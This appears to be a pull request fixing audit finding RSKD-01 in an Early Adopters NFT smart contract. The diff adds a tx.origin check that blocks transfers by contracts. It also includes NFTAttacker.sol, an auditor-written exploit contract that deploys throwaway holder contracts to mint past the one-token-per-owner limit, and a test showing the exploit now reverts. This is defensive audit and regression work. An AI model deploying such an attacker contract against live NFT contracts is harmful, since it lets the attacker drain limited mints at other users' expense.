### PR TITLE
RSKD-01 vulnerability mitigation

### DIFF
--- a/contracts/EarlyAdopters.sol
+++ b/contracts/EarlyAdopters.sol
@@ -64,7 +64,7 @@ contract EarlyAdopters is
 
     string memory uri = _ipfsCids[_nextTokenId];
     uint256 tokenId = _nextTokenId++;
-    _safeMint(msg.sender, tokenId);
+    _safeMint(_msgSender(), tokenId);
     _setTokenURI(tokenId, uri);
   }
 
@@ -74,7 +74,7 @@ contract EarlyAdopters is
    * Here it's allowed to own only one token, thus there's no reason for specifying an ID.
    */
   function burn() external virtual {
-    burn(tokenIdByOwner(msg.sender));
+    burn(tokenIdByOwner(_msgSender()));
   }
 
   /**
@@ -134,6 +134,8 @@ contract EarlyAdopters is
     uint256 tokenId,
     address auth
   ) internal override(ERC721Upgradeable, ERC721EnumerableUpgradeable) returns (address) {
+    // Disallow transfers by smart contracts, as only EOAs can be community members
+    if (_msgSender() != tx.origin) revert ERC721InvalidOwner(_msgSender());
     // allow multiple transfers to zero address to enable burning
     if (to != address(0) && balanceOf(to) > 0) revert ERC721InvalidOwner(to);
     return super._update(to, tokenId, auth);

--- a/contracts/exploit/NFTAttacker.sol
+++ b/contracts/exploit/NFTAttacker.sol
@@ -1,0 +1,91 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.20;
+import {IERC721Receiver} from "@openzeppelin/contracts/token/ERC721/IERC721Receiver.sol";
+import {IERC721} from "@openzeppelin/contracts/token/ERC721/IERC721.sol";
+
+interface MinteableNFT {
+  function mint() external;
+}
+
+/**
+ * @title NFTAttacker
+ * @author Coinspect
+ * @notice The smart contract was developed by a third-party security auditor to demonstrate
+ * how to exploit the `RSKD-01` vulnerability in the EarlyAdopters NFT.
+ * The vulnerability and its mitigation are demonstrated in the test file `test/nftAttacker.test.ts`
+ */
+contract NFTAttacker {
+  address[] internal nftHolders;
+  address internal owner;
+  uint256 public amountOfNftsInControl;
+  uint256 internal latestNftId;
+
+  constructor() {
+    owner = msg.sender;
+  }
+
+  modifier onlyOwner() {
+    require(msg.sender == owner, "not the owner");
+    _;
+  }
+
+  function attack(address _target, uint256 _amountOfNfts) external {
+    while (amountOfNftsInControl != _amountOfNfts) {
+      address newNftHolder = address(new NFTHolder());
+      nftHolders.push(newNftHolder);
+      MinteableNFT(_target).mint(); // this function will call the onERC721Received hook
+      IERC721(_target).safeTransferFrom(address(this), newNftHolder, latestNftId);
+      amountOfNftsInControl += 1;
+    }
+  }
+
+  function transferNFT(address _token, uint256 _tokenId, address _to) external onlyOwner {
+    IERC721(_token).safeTransferFrom(address(this), _to, _tokenId);
+  }
+
+  function moveNFTFromHolder(
+    address _nftHolder,
+    address _token,
+    uint256 _tokenId,
+    address _to
+  ) external onlyOwner {
+    NFTHolder(_nftHolder).transferNFT(_token, _tokenId, _to);
+  }
+
+  function onERC721Received(
+    /* address operator, */
+    /* address from, */
+    uint256 tokenId/* ,
+    bytes calldata data */
+  ) external returns (bytes4) {
+    latestNftId = tokenId;
+    return IERC721Receiver.onERC721Received.selector;
+  }
+}
+
+contract NFTHolder {
+  address internal owner;
+
+  constructor() {
+    owner = msg.sender;
+  }
+
+  modifier onlyOwner() {
+    require(msg.sender == owner, "not the owner");
+
+    _;
+  }
+
+  function transferNFT(address _token, uint256 _tokenId, address _to) external onlyOwner {
+    IERC721(_token).safeTransferFrom(address(this), _to, _tokenId);
+  }
+
+  function onERC721Received(
+    /* address operator,
+    address from,
+    uint256 tokenId,
+    bytes calldata data */
+  ) external pure returns (bytes4) {
+    return IERC721Receiver.onERC721Received.selector;
+  }
+}

--- a/test/nftAttacker.test.ts
+++ b/test/nftAttacker.test.ts
@@ -1,0 +1,40 @@
+import { expect } from 'chai'
+import { ethers, ignition } from 'hardhat'
+import { loadFixture } from '@nomicfoundation/hardhat-toolbox/network-helpers'
+import { EarlyAdopters } from '../typechain-types'
+import EarlyAdoptersModule from '../ignition/modules/EarlyAdoptersModule'
+
+async function deploy() {
+  const { ea } = await ignition.deploy(EarlyAdoptersModule)
+  return ea as unknown as EarlyAdopters
+}
+
+describe('NFT attacker', () => {
+  let ea: EarlyAdopters
+  let eaAddress: string
+  const cidsToLoad = 50 // maximum amount
+  const cidExample = `QmQR9mfvZ9fDFJuBne1xnRoeRCeKZdqajYGJJ9MEDchgqX`
+
+  before(async () => {
+    ea = await loadFixture(deploy)
+    eaAddress = await ea.getAddress()
+  })
+
+  it('should deploy NFT and load CIDs', async () => {
+    await expect(ea.loadCids(Array(cidsToLoad).fill(cidExample)))
+      .to.emit(ea, 'CidsLoaded')
+      .withArgs(cidsToLoad, cidsToLoad)
+
+    expect(await ea.cidsAvailable()).to.equal(cidsToLoad)
+  })
+
+  it('Unable to exploit with Coinspect attacker smart contract', async () => {
+    const nftAttacker = await ethers.deployContract('NFTAttacker')
+    await expect(nftAttacker.attack(eaAddress, cidsToLoad))
+      .to.be.revertedWithCustomError(ea, 'ERC721InvalidOwner')
+      .withArgs(await nftAttacker.getAddress())
+
+    expect(await nftAttacker.amountOfNftsInControl()).to.equal(0)
+    expect(await ea.cidsAvailable()).to.equal(cidsToLoad)
+  })
+})


### PR DESCRIPTION
# What

Resolve `RSKD-01` Early Adopters NFT smart contract vulnerability found by Coinspect independent auditor.
The auditor raised concerns about the potential transfer of tokens to addresses of dynamically created smart contracts. We have removed the ability for our token to interact with smart contracts, as our token is designed to serve as an identifier for external accounts as community members and is not intended for issuance to smart contracts.

- Modify the NFT:  disallow NFT transfers by smart contracts
- Coinspect `NFTAttacker` smart contract
- Provide tests demonstrating that the `NFTAttacker`  can no longer exploit the vulnerability

# Ref

[DAO-599](https://rsklabs.atlassian.net/browse/DAO-599)